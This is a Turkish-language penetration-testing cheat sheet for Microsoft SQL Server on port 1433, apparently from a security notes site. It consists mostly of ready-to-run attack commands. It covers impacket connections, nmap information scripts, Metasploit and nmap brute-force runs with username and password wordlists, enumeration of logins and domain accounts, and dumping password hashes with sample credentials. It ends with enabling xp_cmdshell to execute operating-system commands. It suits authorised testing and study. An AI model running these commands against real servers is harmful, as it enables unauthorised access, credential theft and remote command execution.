MSSQL (1433)

Bağlantı

# GUI
navicat

# Manuel
impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth

Basit Bilgiler

MSSQL sunucusu üzerinde genel bilgileri almak için kullanılır.

nmap --script ms-sql-info -p 1433 192.168.1.3

MSSQL sunucusu hakkında NTLM bilgilerini elde etmek için kullanılır.

nmap -p 1433 --script ms-sql-ntlm-info --script-args mssql.instance-port=1433 192.168.1.3

Brute Force

MSSQL sunucusuna şifre kırma saldırısı yapmak için kullanılır. Belirtilen kullanıcı adı ve şifre listelerini kullanarak deneme yapar.

msfconsole -q
use auxiliary/scanner/mssql/mssql_login
set RHOSTS 192.168.1.3
set USER_FILE /root/Desktop/wordlist/common_users.txt
set PASS_FILE /root/Desktop/wordlist/100-common-passwords.txt
set VERBOSE false
exploit

MSSQL sunucusuna şifre kırma saldırısı yapmak için kullanılır. Belirtilen kullanıcı adı ve şifre listelerini kullanarak deneme yapar.

nmap -p 1433 --script ms-sql-brute --script-args userdb=/root/Desktop/wordlist/common_users.txt,passdb=/root/Desktop/wordlist/100-common-passwords.txt 192.168.1.3

MSSQL sunucusunda boş şifreleri kontrol etmek için kullanılır.

nmap -p 1433 --script ms-sql-empty-password 192.168.1.3

Kullanıcı Listeleme

Bütün MSSQL kullanıcılarını listeler.

msfconsole -q
use auxiliary/admin/mssql/mssql_enum_sql_logins
set RHOSTS 192.168.1.3
exploit

MSSQL sunucu üzerindeki domain hesap bilgilerinin toplanması.

msfconsole -q
use auxiliary/admin/mssql/mssql_enum_domain_accounts
set RHOSTS 192.168.1.3
exploit

MSSQL sunucusundaki kullanıcı şifre hash'lerini çıkarmak için kullanılır.

nmap -p 1433 --script ms-sql-dump-hashes --script-args mssql.username=admin,mssql.password=anamaria 192.168.1.3

Komut Çalıştırma

impacket-mssqlclient Administrator:Pass123@192.168.50.18 -windows-auth

EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

EXECUTE xp_cmdshell 'whoami';

Last updated